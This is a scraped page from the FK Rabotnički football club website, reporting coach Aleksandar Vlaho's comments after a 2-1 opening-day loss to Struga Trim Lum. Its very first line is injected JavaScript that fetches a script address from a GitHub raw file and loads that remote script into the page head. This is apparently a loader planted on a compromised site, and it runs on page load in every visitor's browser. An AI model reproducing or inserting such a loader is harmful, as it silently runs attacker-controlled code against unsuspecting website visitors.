;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Влахо: Слабата реализација не чинеше пораз во Струга
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Влахо: Слабата реализација не чинеше пораз во Струга

Работнички со пораз (2-1) од Струга Трим Лум ја стартуваше новата сезона во Првата фудбалска лига. Играта беше на задоволително ниво, но тимот апсолутно потфрли во реализацијата на создадените шанси. Противникот тоа умееше да го казни и стигна до триумф. На Александар Влахо и на фудбалерите им останува да анализираат и да ги корегираат грешките за натпреварот во следното коло.

„Никој не посакува пораз на стартот. Резултатски секако не можеме да бидеме задоволни. Но, играта беше на задоволително ниво, создадовме неколку одлични шанси, единствено потфрливме во реализацијата. Моравме да бидеме поефикасни, создадовме 6-7 убави можности пред противничкиот гол. Честитки за тимот на Струга Трим Лум за триумфот, ние останува да ја подобриме реализацијата, а верувам дека ќе биде многу поинаку веќе на следниот натпревар кога ќе го имаме на располагање и новото засилување Станиша Крстевски. Се надевам дека до крајот на преодниот рок ќе доведеме уште едно или две засилувања и Работнички ќе игра значајна улога во шампионатот“, вели шефот на стручниот штаб, Александар Влахо.